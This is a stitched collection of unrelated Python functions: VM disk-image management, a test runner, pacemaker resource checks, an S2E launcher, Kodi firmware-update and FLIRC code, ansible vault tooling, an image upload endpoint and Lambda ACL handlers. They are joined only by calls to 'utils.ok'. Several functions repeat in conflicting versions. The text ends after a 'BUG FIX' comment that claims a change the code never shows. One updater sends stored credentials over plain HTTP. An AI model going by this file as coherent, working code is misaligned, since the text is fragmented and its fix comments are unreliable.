def delete(self, snapshot: str=None, **kwargs: dict):
    """Delete a snapshot of this VM, or the whole VM directory.

    :param snapshot: snapshot name to delete; when falsy, the entire VM is
                     deleted after interactive confirmation.
    :param kwargs: expects the key 'name[:snapshot]' carrying the raw CLI
                   argument (used verbatim in status messages).
    Exits the process with status 1 on any failure.
    """
    if snapshot:
        # Snapshot path: remove the single file "<path_raw>.<snapshot>".
        utils.pend("delete snapshot %s" % kwargs['name[:snapshot]'])
        if snapshot not in self.snapshots:
            utils.fail("%s: snapshot does not exist" % kwargs['name[:snapshot]'])
            exit(1)
        try:
            os.unlink('%s.%s' % (self.path_raw, snapshot))
            utils.ok()
        except PermissionError:
            utils.fail("Permission denied")
            exit(1)
    else:
        # Whole-VM path: require the directory to exist and ask the user
        # (defaulting to "no") before recursively removing it.
        if not os.path.isdir(self.path):
            utils.fail("%s: VM does not exist" % self.name)
            exit(1)
        if not utils.ask("Delete VM %s?" % self.name, default=False):
            exit(1)
        utils.pend("delete %s" % self.name)
        try:
            shutil.rmtree(self.path)
            utils.ok()
        except PermissionError:
            utils.fail("Permission denied")
            exit(1)
def main(test_filter=None):
    """Discover and run test suites matching *test_filter*, printing
    gtest-style progress output.

    :param test_filter: glob/filter pattern for test selection; "*" when falsy.
    Exits with status 1 on parse errors or when any test fails.
    """
    if not test_filter:
        test_filter = "*"
    try:
        test_suite = list(TestParser.read_all(test_filter))
    except (UnknownFieldError, RequiredFieldError) as error:
        print(fail(str(error)))
        exit(1)
    # Count every test across all suites for the header line.
    total_tests = 0
    for fname, suite_tests in test_suite:
        total_tests += len(suite_tests)
    failed_tests = []
    print(
        ok("[==========]") + " Running %d tests from %d test cases.\n" %
        (total_tests, len(test_suite)))
    start_time = time.time()
    skipped_tests = []
    for fname, tests in test_suite:
        print(ok("[----------]") + " %d tests from %s" % (len(tests), fname))
        for test in tests:
            status = Utils.run_test(test)
            if Utils.skipped(status):
                skipped_tests.append((fname, test, status))
            if Utils.failed(status):
                failed_tests.append("%s.%s" % (fname, test.name))
        # TODO(mmarchini) elapsed time per test suite and per test (like gtest)
        print(ok("[----------]") + " %d tests from %s\n" % (len(tests), fname))
    elapsed = time.time() - start_time
    # Skipped tests are excluded from the "ran" total reported below.
    total_tests -= len(skipped_tests)
    # TODO(mmarchini) pretty print time
    print(
        ok("[==========]") + " %d tests from %d test cases ran. (%s total)" %
        (total_tests, len(test_suite), elapsed))
    print(
        ok("[ PASSED ]") + " %d tests." % (total_tests - len(failed_tests)))
    if skipped_tests:
        print(
            warn("[ SKIP ]") + " %d tests, listed below:" % len(skipped_tests))
        # NOTE: this loop rebinds `test_suite` to a suite name; harmless, as
        # the original list is not used after this point.
        for test_suite, test, status in skipped_tests:
            print(
                warn("[ SKIP ]") + " %s.%s (%s)" %
                (test_suite, test.name, Utils.skip_reason(test, status)))
    if failed_tests:
        print(
            fail("[ FAILED ]") + " %d tests, listed below:" % len(failed_tests))
        for failed_test in failed_tests:
            print(fail("[ FAILED ]") + " %s" % failed_test)
    if failed_tests:
        exit(1)
def _pacemaker_host_check():
    """Check that a pacemaker resource is started, and on which node.

    Parses `pcs status` (or `crm_mon -1` with --crm) output. Exits through
    utils.critical()/utils.ok() with a Nagios-style status; when the
    resource runs on this node, _ok_run_script() exec's the optional script.
    """
    parser = argparse.ArgumentParser(
        description='Check amqp connection of an OpenStack service.')
    parser.add_argument('-r', dest='pacemaker_resource',
                        help='pacemaker resource', required=True)
    parser.add_argument('-s', dest='script', required=False, help='Script')
    parser.add_argument('--crm', dest='crm', required=False,
                        help='Use "crm_mon -1" instead of "pcs status"',
                        action='store_true', default=False)
    options = parser.parse_args()
    if options.script and (not os.path.isfile(options.script)
                           or not os.access(options.script, os.X_OK)):
        utils.critical('the script %s could not be read' % options.script)
    local_hostname = subprocess.check_output(['hostname', '-s']).strip()
    try:
        if options.crm:
            output = subprocess.check_output(['crm_mon', '-1'])
        else:
            output = subprocess.check_output(['pcs', 'status'])
    except subprocess.CalledProcessError as e:
        # BUG FIX: the format arguments must be a tuple; previously only
        # e.returncode fed the two-placeholder format (TypeError) and
        # e.output was passed as a spurious second argument.
        utils.critical('pcs status with status %s: %s'
                       % (e.returncode, e.output))
    except OSError:
        utils.critical('pcs not found')
    # Merge indented continuation lines, then normalise whitespace per line.
    for line in re.sub("\n +", " ", output).splitlines():
        line = " ".join(line.strip().split())  # Sanitize separator
        if not line:
            continue
        resource, remaining = line.split(None, 1)
        if resource == options.pacemaker_resource:
            # Plain resource line: "<name> <agent> <status> [<host>]".
            agent, __, remaining = remaining.partition(' ')
            if ' ' in remaining:
                status, __, current_hostname = remaining.partition(' ')
            else:
                status, current_hostname = remaining, ''
            if status != "Started":
                utils.critical("pacemaker resource %s is not started (%s)"
                               % (resource, status))
            if current_hostname != local_hostname:
                utils.ok("pacemaker resource %s doesn't run on this node "
                         "(but on %s)" % (resource, current_hostname))
            _ok_run_script(options)
        elif resource == 'Clone':
            _check_resource_in_host(remaining, 'Started:', options,
                                    local_hostname)
        elif resource == 'Master/Slave':
            _check_resource_in_host(remaining, 'Masters:', options,
                                    local_hostname)
    else:
        # for/else: only reached when no line matched -- the matching
        # branches above terminate the process via utils.ok()/critical().
        utils.critical('pacemaker resource %s not found'
                       % options.pacemaker_resource)
def async_send_command(command, host, port, timeout):
    """Fork a child that keeps retrying to send *command* to host:port.

    The parent returns immediately. The child retries once per second until
    the command is accepted, *timeout* seconds elapse, or the parent dies.
    The child always terminates via exit() and never returns to the caller.
    """
    pid = os.getpid()
    if os.fork() != 0:
        # Parent process: nothing more to do here.
        return
    # Avoid the pesky KeyboardInterrupts in the child
    signal.signal(signal.SIGINT, signal.SIG_IGN)
    command_deadline = datetime.now() + timedelta(seconds=timeout)
    utils.pend("sending command %s to %s:%d" % (command.args, host, port))
    while True:
        try:
            os.kill(pid, 0)  # check if parent is still here
        except OSError:
            # Parent is gone; stop retrying.
            break
        now = datetime.now()
        if now < command_deadline:
            try:
                send_command(command, host, port, TIMEOUT_CMD_SEND)
            except CommandError as e:
                utils.pend(None, msg="%s, retrying for %d more seconds"
                           % (e, (command_deadline - now).seconds))
            else:
                utils.ok("command %s successfully sent" % command.args)
                exit(0)
        else:
            utils.abort("command timeout")
            break
        time.sleep(1)
    exit(1)
def _pacemaker_host_check():
    """Check a pacemaker resource's state and location via `pcs status`.

    Exits through utils.critical()/utils.ok() with a Nagios-style status;
    when the resource runs on this node, the mandatory script replaces
    this process via os.execvp().
    """
    parser = argparse.ArgumentParser(description="Check amqp connection of an OpenStack service.")
    parser.add_argument("-r", dest="pacemaker_resource", help="pacemaker resource", required=True)
    parser.add_argument("-s", dest="script", required=True, help="Script")
    options = parser.parse_args()
    local_hostname = subprocess.check_output(["hostname", "-s"]).strip()
    try:
        output = subprocess.check_output(["pcs", "status"])
    except subprocess.CalledProcessError as e:
        # BUG FIX: format args must be a tuple (previously `% e.returncode`
        # raised TypeError and e.output became a stray second argument).
        utils.critical("pcs status with status %s: %s"
                       % (e.returncode, e.output))
    except OSError:
        utils.critical("pcs not found")
    for line in output.splitlines():
        line = " ".join(line.strip().split())  # Sanitize separator
        if not line:
            continue
        resource, remaining = line.split(None, 1)
        if resource == options.pacemaker_resource:
            # Resource line: "<name> <agent> <status> [<host>]".
            agent, __, remaining = remaining.partition(" ")
            if " " in remaining:
                status, __, current_hostname = remaining.partition(" ")
            else:
                status, current_hostname = remaining, ""
            if status != "Started":
                utils.critical("pacemaker resource %s is not started (%s)"
                               % (resource, status))
            if current_hostname != local_hostname:
                # BUG FIX: message was missing the verb ("doesn't on this node").
                utils.ok("pacemaker resource %s doesn't run on this node "
                         "(but on %s)" % (resource, current_hostname))
            script = shlex.split(options.script)
            os.execvp(script[0], script)
    else:
        # for/else: only reached when no line matched -- the branch above
        # either exits via utils.* or exec's the script.
        utils.critical("pacemaker resource %s not found"
                       % options.pacemaker_resource)
def vm_init(path: str):
    """Create the top-level VM directory, reporting progress via utils.

    :param path: directory to create.
    Exits with status 1 when the directory cannot be created.
    """
    utils.pend("initialise VM directory: %s" % path)
    try:
        os.mkdir(path)
    except OSError as e:
        # BUG FIX: OSError has no .strip(); format the exception instead.
        utils.fail(str(e))
        exit(1)
    utils.ok()
def _pacemaker_host_check():
    """Check that a pacemaker resource is started, and on which node.

    Parses `pcs status` (or `crm_mon -1` with --crm) output. Exits through
    utils.critical()/utils.ok() with a Nagios-style status; when the
    resource runs on this node, _ok_run_script() exec's the optional script.
    """
    parser = argparse.ArgumentParser(
        description='Check amqp connection of an OpenStack service.')
    parser.add_argument('-r', dest='pacemaker_resource',
                        help='pacemaker resource', required=True)
    parser.add_argument('-s', dest='script', required=False, help='Script')
    parser.add_argument('--crm', dest='crm', required=False,
                        help='Use "crm_mon -1" instead of "pcs status"',
                        action='store_true', default=False)
    options = parser.parse_args()
    if options.script and (not os.path.isfile(options.script)
                           or not os.access(options.script, os.X_OK)):
        utils.critical('the script %s could not be read' % options.script)
    local_hostname = subprocess.check_output(['hostname', '-s']).strip()
    try:
        if options.crm:
            output = subprocess.check_output(['crm_mon', '-1'])
        else:
            output = subprocess.check_output(['pcs', 'status'])
    except subprocess.CalledProcessError as e:
        # BUG FIX: the format arguments must be a tuple; previously only
        # e.returncode fed the two-placeholder format (TypeError) and
        # e.output was passed as a spurious second argument.
        utils.critical('pcs status with status %s: %s'
                       % (e.returncode, e.output))
    except OSError:
        utils.critical('pcs not found')
    # Merge indented continuation lines, then normalise whitespace per line.
    for line in re.sub("\n +", " ", output).splitlines():
        line = " ".join(line.strip().split())  # Sanitize separator
        if not line:
            continue
        resource, remaining = line.split(None, 1)
        if resource == options.pacemaker_resource:
            # Plain resource line: "<name> <agent> <status> [<host>]".
            agent, __, remaining = remaining.partition(' ')
            if ' ' in remaining:
                status, __, current_hostname = remaining.partition(' ')
            else:
                status, current_hostname = remaining, ''
            if status != "Started":
                utils.critical("pacemaker resource %s is not started (%s)"
                               % (resource, status))
            if current_hostname != local_hostname:
                utils.ok("pacemaker resource %s doesn't run on this node "
                         "(but on %s)" % (resource, current_hostname))
            _ok_run_script(options)
        elif resource == 'Clone':
            _check_resource_in_host(remaining, 'Started:', options,
                                    local_hostname)
        elif resource == 'Master/Slave':
            _check_resource_in_host(remaining, 'Masters:', options,
                                    local_hostname)
    else:
        # for/else: only reached when no line matched -- the matching
        # branches above terminate the process via utils.ok()/critical().
        utils.critical('pacemaker resource %s not found'
                       % options.pacemaker_resource)
def create(self, size: str, force: bool, **kwargs: dict):
    """Create a fresh raw disk image of the given size for this VM.

    :param size: qemu-img size spec, e.g. "5G" or "1048576".
    :param force: overwrite an existing VM directory when True.
    """
    self.initialise(force)
    # A size ending in a digit is a plain byte count ("...B"); a unit
    # suffix such as "G" is reported as a binary unit ("GiB").
    infix = '' if size[-1] in '0123456789' else 'i'
    utils.pend("create %s%sB image" % (size, infix))
    qemu_img = '%s/qemu-img' % self.path_executable
    utils.execute([qemu_img, 'create', '-f', 'raw', self.path_raw, size],
                  msg="execute qemu-img")
    self.size = size
    utils.ok()
def import_raw(self, raw: str, force: bool):
    """Copy an existing raw image file into place as this VM's disk.

    :param raw: path to the source raw image file.
    :param force: overwrite an existing VM directory when True.
    """
    if os.path.exists(raw):
        self.initialise(force)
        utils.pend("copy disk image")
        utils.execute(['cp', raw, self.path_raw])
        utils.ok()
    else:
        utils.fail("%s: file not found" % raw)
        exit(1)
def loadLibrary(self):
    # Load the native FLIRC shared library via ctypes. On any failure the
    # error is logged, a dialog is shown and self.lib is left as None so
    # callers can detect the unusable state.
    path = 'unknown'
    try:
        path = utils.getFlircLibrary()
        self.lib = ctypes.cdll.LoadLibrary(path)
    except Exception, e:
        utils.log('***** loadLibary Failed *****')
        utils.log('library path = %s' % path)
        utils.log('err = %s' % str(e))
        # NOTE(review): the numeric args look like localized string ids for
        # a failure dialog -- confirm against the utils module.
        utils.ok(1, 5, 0, 6)
        self.lib = None
def verify():
    """Ensure every ansible file and key is vault-encrypted; exit 0 when clean."""
    # Any file still carrying the decrypted tag must be re-encrypted
    # before it can be committed.
    for name in find_matching_files(DECRYPTED_TAG):
        utils.error('Found decrypted file', "'" + name + "'.",
                    "Run 'ansible-playkit vault encrypt' before commit")
    # Keys are reported by base name only.
    plain_keys = [os.path.basename(k) for k in get_unencrypted_keys()]
    if plain_keys:
        utils.error("Found unencrypted keys: ", ', '.join(plain_keys))
    utils.ok('All files encrypted. Ok.')
    sys.exit(0)
def _ok_run_script(options):
    '''If there is a script to run it is executed otherwise a default message.

    Argument:
        options (Object) -- main program arguments
    '''
    if not options.script:
        utils.ok("pacemaker resource %s is running" % options.pacemaker_resource)
        return
    # Replace the current process with the configured script.
    argv = shlex.split(options.script)
    os.execvp(argv[0], argv)
def checkForUpdate(silent = 1):
    # Entry point of the OTA update check. *silent* doubles as a mode flag:
    # '2'/'3' delegate to reboot handling, '4' triggers a manual
    # (user-driven) update, any other value is coerced to a bool that
    # suppresses UI dialogs when True.
    if silent == '2' or silent=='3':
        utils.rebootCommand(silent)
        return
    if silent == '4':
        # Manual update: log in to the update server (cookie session) and
        # fetch the firmware list for this specific device.
        try:
            username = utils.getSetting('username')
            password = utils.getSetting('password')
            tinyosid = getHwAddr('wlan0')
            tinyoshw = utils.getSetting('device')
            url = 'http://tinyhtpc.co.nz/downloads/tinyos-list.php'
            cj = cookielib.CookieJar()
            opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
            login_data = urllib.urlencode({'username' : username, 'password' : password})
            opener.open(url, login_data)
            post_id = urllib.urlencode({'tinyosid' : tinyosid, 'tinyoshw' : tinyoshw})
            resp = opener.open(url, post_id)
            response = resp.read()
            #print response
        except:
            # Network or auth failure: silently abort the manual update.
            return []
        performManualUpdate(response, silent)
        return
    utils.saveOta()
    utils.saveHW()
    utils.saveID()
    # From here on *silent* is a plain bool.
    silent = int(silent) == 1
    if silent and utils.getSetting('autoUpdate') == 'false':
        return allDone(silent)
    response = getResponse()
    isValid = len(response) > 0
    if not isValid:
        # No/invalid server response: optionally tell the user, then finish.
        if not silent:
            utils.ok(1, 12, 13)
        return allDone(silent)
    if updateAvailable(response['Version']):
        utils.log('Update Available')
        performUpdate(response, silent)
    elif not silent:
        # Up to date: either resume a previous download or say so.
        if downloaded():
            checkPrevious()
        else:
            utils.ok(1, 22, 13)
    allDone(silent)
def execute(args, cmd_line):
    """Prepare the environment for a chef/S2E run and exec *cmd_line*.

    Prints connection info, creates the per-experiment directory, optionally
    arms a kill timer and a watchdog command/script, then replaces this
    process with the qemu command line (os.execvpe does not return).
    """
    # Informative:
    ip = utils.get_default_ip()
    if args['headless']:
        utils.info("VNC: port %d (connect with `$vncclient %s:%d`)"
                   % (args['vnc_port'], ip, args['vnc_display']))
    utils.info("Qemu monitor: port %d (connect with `{nc,telnet} %s %d)"
               % (args['monitor_port'], ip, args['monitor_port']))
    if args['mode'] == 'sym':
        utils.info("Experiment name: %s" % args['expname'])
    if args['script'] or args['command']:
        utils.info("Watchdog: port %d" % args['command_port'])
    utils.debug("Command line:\n%s" % ' '.join(cmd_line))
    if args['dry_run']:
        exit(1)
    environ = dict(os.environ)
    if args['mode'] == 'sym':
        # Make the experiment's Lua configuration discoverable by S2E.
        environ['LUA_PATH'] = ';'.join(['%s/?.lua' % args['config_root'],
                                        environ.get('LUA_PATH', '')])
        utils.debug("LUA_PATH=%s" % environ['LUA_PATH'])
    # each experiment gets its own directory:
    try:
        utils.pend("Creating experiment directory %s" % args['exppath'])
        os.makedirs(args['exppath'])
        utils.ok()
    except FileExistsError:
        utils.fail("Experiment %s already exists. Please choose another name."
                   % args['expname'])
        exit(1)
    if args['timeout']:
        kill_me_later(args['timeout'])
    # Build the watchdog payload: a script module or a raw command; a
    # command takes precedence when both are given.
    obj = None
    if args['script']:
        module_file, test = args['script']
        with open(module_file, 'r') as f:
            code = f.read()
        obj = Script(code=code, test=test)
    if args['command']:
        obj = Command.from_cmd_args(args['command'], args['env_var'] or [])
    if obj:
        # Sent from a forked child while qemu boots (see async_send_command).
        async_send_command(obj, 'localhost', args['command_port'], TIMEOUT_CMD)
    # drop `s2e-last` symlink somewhere where it does not get in the way:
    os.chdir(utils.CHEFROOT_EXPDATA)
    os.execvpe(cmd_line[0], cmd_line, environ)
def checkFlirc(self):
    """Poll the FLIRC device state and refresh the dialog controls."""
    try:
        # IDIOM FIX: identity comparison with None (`is None`, not `== None`).
        if self.flirc.lib is None:
            utils.ok(1, 5, 0, 6)
            self.close(utils.CLOSED)
            return
        self.isConnected = self.flirc.checkConnect()
        self.getControl(self.style + CONNECTED).setVisible(self.isConnected)
        self.getControl(FIRMWARE).setLabel(utils.getFirmwareString(self.flirc.version))
        self.timerOn()
    except Exception:
        # ROBUSTNESS FIX: narrowed from a bare `except:` so SystemExit /
        # KeyboardInterrupt are no longer swallowed; UI refresh remains
        # deliberately best-effort.
        pass
def export(self, targz: str, **kwargs: dict):
    """Pack this VM's disk image and snapshots into a .tar.gz archive.

    :param targz: output archive path; defaults to "<name>.tar.gz".
    Exits with status 1 if the VM or the target archive already misses/exists.
    """
    if not os.path.isdir(self.path):
        utils.fail("%s: VM does not exist" % self.name)
        exit(1)
    if not targz:
        targz = '%s.tar.gz' % self.name
    targz = os.path.abspath(targz)
    utils.info("exporting to %s" % targz)
    # The intermediate (uncompressed) tar lives inside the VM directory.
    tar = '%s/%s' % (self.path, os.path.basename(os.path.splitext(targz)[0]))
    if os.path.exists(targz):
        utils.fail("%s: package already exists" % targz)
        exit(1)
    os.chdir(self.path)  # create intermediate files in VM's path
    utils.pend("package disk image")
    # -S stores the (typically sparse) raw image efficiently.
    utils.execute(['tar', '-cSf', tar, os.path.basename(self.path_raw)])
    utils.ok()
    # Append each snapshot file "<image>.<snapshot>" to the archive.
    for s in self.snapshots:
        utils.pend("package snapshot: %s" % s)
        local_snapshot = '%s.%s' % (os.path.basename(self.path_raw), s)
        utils.execute(['tar', '-rf', tar, local_snapshot])
        utils.ok()
    utils.pend("compress package", msg="may take some time")
    utils.execute(['gzip', '-c', tar], outfile=targz)
    utils.ok()
    utils.pend("clean up")
    os.unlink(tar)
    utils.ok()
    self.scan_snapshots()
def checkFlirc(self):
    """Poll the FLIRC device state and refresh the dialog controls."""
    try:
        # IDIOM FIX: identity comparison with None (`is None`, not `== None`).
        if self.flirc.lib is None:
            utils.ok(1, 5, 0, 6)
            self.close(utils.CLOSED)
            return
        self.isConnected = self.flirc.checkConnect()
        self.getControl(self.style + CONNECTED).setVisible(
            self.isConnected)
        self.getControl(FIRMWARE).setLabel(
            utils.getFirmwareString(self.flirc.version))
        self.timerOn()
    except Exception:
        # ROBUSTNESS FIX: narrowed from a bare `except:` so SystemExit /
        # KeyboardInterrupt are no longer swallowed; UI refresh remains
        # deliberately best-effort.
        pass
async def upimg(request):
    """Handle an authenticated image upload; store it content-addressed by MD5.

    Returns a fail(...) response for auth/validation errors, otherwise
    ok({"path": ...}) with the public path of the stored image.
    """
    # Reject callers that do not present the upload token.
    if request.headers.get('token') != TOKEN:
        return fail('您没有使用本服务的权限')
    # BUG FIX: was `and`, letting a request with a files dict but no 'file'
    # field slip through and crash below; either missing piece must reject.
    if not request.files or not request.files.get('file'):
        return fail('error args')
    image = request.files.get('file').body
    # Detect the image type from its leading bytes; unsupported types yield
    # a marker string containing 'error'.
    imageSuffix = getSuffix(bytes2hex(image))
    if 'error' in imageSuffix:
        return fail(imageSuffix)
    # Content-addressed layout: <baseDir>/<md5[:2]>/<md5[2:]>.<suffix>
    md5Name = hashlib.md5(image).hexdigest()
    saveDir = baseDir + md5Name[0:2] + '/'
    savePath = saveDir + md5Name[2:] + '.' + imageSuffix
    resPath = '/' + md5Name[0:2] + '/' + md5Name[2:] + '.' + imageSuffix
    # Create the shard directory if needed (race-safe).
    os.makedirs(saveDir, exist_ok=True)
    # ROBUSTNESS FIX: context manager guarantees the handle is closed.
    with open(savePath, 'wb') as fp:
        fp.write(image)
    return ok({"path": resPath})
def lambda_handler(event, context):
    """Dispatch ACL actions from a Lambda event.

    Currently handles 'check-user-permissions': validates the body, then
    checks the requested permission against the user's permission set.
    Returns None for other (allowed) actions, matching the original flow.
    """
    # BUG FIX: use .get() so an event without a "body" key yields the 400
    # below instead of raising KeyError.
    body = event.get("body") or None
    if not body:
        return bad_request(
            {'message': 'Event request does not contain body object'})
    if 'action' not in body:
        return bad_request({'message': 'Body does not contain \'action\' key'})
    if body["action"] not in ALLOWED_ACTIONS:
        return bad_request({
            'message':
                'Body does not contain a valid action. Valid actions are: '
                + ','.join(ALLOWED_ACTIONS)
        })
    if body["action"] == 'check-user-permissions':
        if not ACL_MANAGEMENT_VALIDATOR.validate(body):
            return bad_request(ACL_MANAGEMENT_VALIDATOR.errors)
        # get the permission of the user
        user_permission = get_permissions_by_user_id(body["user_id"])
        if body["permission"] in user_permission:
            return ok({'authorized': 'True'})
        # else, return bad request
        return forbidden()
def get_site_settings_values():
    """Load the site settings row from the database and return it as an
    OK response, or an internal-server-error response on DB failure."""
    sql = '''
        select site_visibility, title, fontsize, selfurl, coloraccent,
        isdarkmode, description, copyright, websiteurl, brandmail,
        brandlogourl, faviconurl, appiconurl from settings.site_settings
    '''
    method, response = db_handler(
        {'body': {'action': 'run', 'queries': [sql]}})
    if method != 'ok':
        return internal_server_error()
    # The row arrives wrapped in one extra character on each side; strip
    # them before JSON-decoding.
    settings_json = response[0][1:-1]
    return ok(json.loads(settings_json))
def run(args):
    """Deploy a playbook: decrypt the inventory key, run ansible, restore
    the encrypted key and clean up the plain vault password.

    :param args: CLI argument list (inventory, playbook, tags, options).
    Exits with the playbook's return code.
    """
    parser = argparse.ArgumentParser(prog='ansible-playkit play',
                                     description='deploy')
    parser.add_argument('inventory', help='inventory name')
    parser.add_argument('playbook', help='playbook name')
    parser.add_argument('tags', nargs='*',
                        help='Playbook tags which should be used')
    parser.add_argument('--vault-password', dest='vault_password',
                        required=False, help='Ansible Vault password')
    parser.add_argument('--ansible-opts', dest='ansible_opts', required=False,
                        help='Additional Ansible Playbook options')
    args = parser.parse_args(args)
    inventory_path = os.path.join(INVENTORIES_PATH, args.inventory)
    if os.path.exists(inventory_path):
        utils.ok('Using inventory', inventory_path)
    else:
        utils.error('Inventory not found', inventory_path)
    key_path = os.path.join(KEYS_PATH, '{}.pem'.format(args.inventory))
    if os.path.exists(key_path):
        utils.ok('Using encrypted key', key_path)
    else:
        utils.error('Encrypted key not found', key_path)
    playbook_filename = args.playbook + '.yml'
    r = 0
    key_path_copy = key_path + '.copy'
    try:
        if args.vault_password is not None:
            save_plain_vault_password(args.vault_password)
        install_ansible_requirements()
        # Keep a pristine encrypted copy so the key can be restored if the
        # play is interrupted before re-encryption.
        shutil.copyfile(key_path, key_path_copy)
        vault.run_ansible_vault('decrypt', [key_path])
        r = run_playbook(inventory_path, playbook_filename, key_path,
                         args.tags, args.ansible_opts)
    except Exception as e:
        # BUG FIX: Exception.message does not exist on Python 3; str(e)
        # works on both Python 2 and 3.
        utils.error(str(e))
    finally:
        try:
            os.remove(vault.VAULT_PLAIN_PASSWORD_FILENAME)
        except OSError:
            pass
        # Restore the encrypted key if it was left decrypted.
        if (not vault.file_matches(key_path, vault.ENCRYPTED_TAG)
                and os.path.exists(key_path_copy)):
            shutil.move(key_path_copy, key_path)
    sys.exit(r)
def run(self):
    """Parse the DICOM directory, build the dcm2niibatch YAML file and
    (after confirmation, unless --yes) launch the conversion.

    :returns: 0 on completion.
    """
    utils.new_line()
    utils.info('Parse and group DICOM directory')
    self._parser.parse_acquisitions()
    utils.new_line()
    utils.info('Sort and set up acquisitions')
    self._parser.sort_acquisitions()
    #utils.new_line()
    #utils.ok('Acquisitions of interest:')
    #for _ in self._parser.caught: utils.info(_)
    utils.new_line()
    utils.warning('Acquisitions excluded:')
    for _ in self._parser._excluded:
        utils.info(_)
    utils.new_line()
    utils.info('Create YAML file for dcm2niibatch')
    for acq in self._parser.acquisitions:
        self._batch.add(acq)
    self._batch.write()
    utils.new_line()
    utils.ok('Batch file:')
    self._batch.show()
    if self._yes:
        # --yes given: skip the interactive confirmation.
        launchBatch = True
    else:
        msg = "Do you want to launch dcm2niibatch ?"
        launchBatch = utils.query_yes_no(msg)
    if launchBatch:
        self._batch.launch()
        # Post-process the sidecar JSON files after conversion.
        for acq in self._parser.acquisitions:
            acq.update_json()
    else:
        # Tell the user how to run the batch manually later.
        utils.new_line()
        utils.ok("To launch dcm2niibatch later:")
        utils.info("cd {}".format(self._codeDir))
        utils.info(self._batch.command)
    return 0
def performUpdate(response, silent):
    # Download the firmware referenced by *response* (dict with 'Version',
    # 'Link', 'MD5') and verify its MD5. Retries up to three times in
    # silent mode; on persistent failure the stored download state is reset.
    try:
        version = response['Version']
        link = response['Link']
        md5 = response['MD5']
    except:
        # Malformed server response: nothing to do.
        return
    path = getDownloadPath()
    if utils.generateMD5(path) != md5:
        # No valid copy on disk yet; in interactive mode ask before downloading.
        if (not silent) and (not utils.yesno(1, 10, 11)):
            return
        dp = None
        if not silent:
            # Progress dialog only when the user is watching.
            dp = utils.progress(1, 14, 15)
        hash = 0
        count = 0
        nTries = 3
        if not silent:
            nTries = 1
        while (count < nTries) and (hash != md5):
            count += 1
            try:
                download(link, path, dp)
                hash = utils.generateMD5(path)
            except Exception, e:
                # Failed/partial download: remove it before retrying.
                utils.deleteFile(path)
                if str(e) == 'Canceled':
                    return
        if hash != md5:
            # All attempts failed: clear the pending-update state.
            utils.unflagUpdate()
            utils.deleteFile(path)
            utils.setSetting('dVersion', '0.0.0')
            if not silent:
                utils.ok(1, 24, 13)
            return
def performUpdate(response, silent):
    # Download the firmware referenced by *response* (dict with 'Version',
    # 'Link', 'MD5') and verify its MD5. Retries up to three times in
    # silent mode; on persistent failure the stored download state is reset.
    try:
        version = response['Version']
        link = response['Link']
        md5 = response['MD5']
    except:
        # Malformed server response: nothing to do.
        return
    path = getDownloadPath()
    if utils.generateMD5(path) != md5:
        # No valid copy on disk yet; in interactive mode ask before downloading.
        if (not silent) and (not utils.yesno(1, 10, 11)):
            return
        dp = None
        if not silent:
            # Progress dialog only when the user is watching.
            dp = utils.progress(1, 14, 15)
        hash = 0
        count = 0
        nTries = 3
        if not silent:
            nTries = 1
        while (count < nTries) and (hash != md5):
            count += 1
            try:
                download(link,path,version,dp)
                hash = utils.generateMD5(path)
            except Exception, e:
                # Failed/partial download: remove it before retrying.
                utils.deleteFile(path)
                if str(e) == 'Canceled':
                    return
        if hash != md5:
            # All attempts failed: clear the pending-update state.
            utils.unflagUpdate()
            utils.deleteFile(path)
            utils.setSetting('dVersion', '0.0.0')
            if not silent:
                utils.ok(1, 24, 13)
            return
def clone(self, clone: str, force: bool, **kwargs: dict):
    """Duplicate this VM (disk image plus snapshots) under a new name.

    :param clone: name of the new VM; must differ from this VM's name.
    :param force: passed to VM.initialise() to overwrite an existing VM.
    Exits with status 1/2 on precondition failures.
    """
    if not os.path.isdir(self.path):
        utils.fail("%s: VM does not exist" % self.name)
        exit(1)
    if self.name == clone:
        utils.fail("%s: please specify a different name" % clone)
        exit(2)
    new = VM(clone)
    new.initialise(force)
    # http://bugs.python.org/issue10016
    utils.pend("copy disk image", msg="may take some time")
    utils.execute(['cp', self.path_raw, new.path_raw])
    utils.ok()
    for s in self.snapshots:
        utils.pend("copy snapshot: %s" % s)
        # NOTE(review): snapshots are copied into the new VM's directory
        # keeping this VM's raw-image basename. Confirm the basename does
        # not embed the VM name; otherwise the destination should probably
        # be '%s.%s' % (new.path_raw, s).
        utils.execute(['cp', '%s.%s' % (self.path_raw, s), new.path])
        utils.ok()
    new.scan_snapshots()
def checkForUpdate(silent = 1):
    # OTA update entry point. *silent* doubles as a mode flag: '2'/'3'
    # delegate to reboot handling, '4' triggers a manual update, any other
    # value is coerced to a bool that suppresses UI dialogs when True.
    if silent == '2' or silent=='3':
        utils.rebootCommand(silent)
        return
    if silent == '4':
        # Manual update: fetch the firmware list for this CPU type.
        try:
            url = 'http://cloud.thelittleblackbox.co.uk/manual.{0}.php'.format(utils.getAmlogicCpuType())
            response = urllib2.urlopen(url).read()
        except:
            # Network failure: silently abort the manual update.
            return []
        performManualUpdate(response, silent)
        return
    utils.saveOta()
    # From here on *silent* is a plain bool.
    silent = int(silent) == 1
    if silent and utils.getSetting('autoUpdate') == 'false':
        return allDone(silent)
    response = getResponse()
    isValid = len(response) > 0
    if not isValid:
        # No/invalid server response: optionally tell the user, then finish.
        if not silent:
            utils.ok(1, 12, 13)
        return allDone(silent)
    if updateAvailable(response['Version']):
        utils.log('Update Available')
        performUpdate(response, silent)
    elif not silent:
        # Up to date: either resume a previous download or say so.
        if downloaded():
            checkPrevious()
        else:
            utils.ok(1, 22, 13)
    allDone(silent)
def _check_resource_in_host(remaining, match_word, options, local_hostname):
    '''Searches for resource and a local_hostname on the rest of the line

    It checks if the resource is the second or third word on the line and
    search for the host on the running nodes

    Arguments:
        :param remaining: (str)-- the rest of the line
        :param match_word: (str)-- 'Started:'-->Clone or 'Master'-->Master/Slave
        :param options: (object)-- main program arguments
        :param local_hostname: -- localhost
    '''
    # Matches "Set: <res> [...]" or "Set: ... [<res>]" followed by the
    # match word and a bracketed node list (captured as group 2).
    engine = re.compile(r'Set: (' + options.pacemaker_resource + r' \[.*\]|.* \['
                        + options.pacemaker_resource + r'\]) ' + match_word
                        + r' (\[.*?\])')
    patterns = re.search(engine, remaining)
    if patterns is not None:
        # Strip the surrounding brackets from the node list.
        host_list = patterns.group(2).split()[1:-1]
        for host in host_list:
            if host == local_hostname:
                # Resource runs here: exec the script / report OK
                # (does not return).
                _ok_run_script(options)
        # BUG FIX: `resource` was undefined here (NameError); report the
        # resource we were asked about. Also added the missing verb "run".
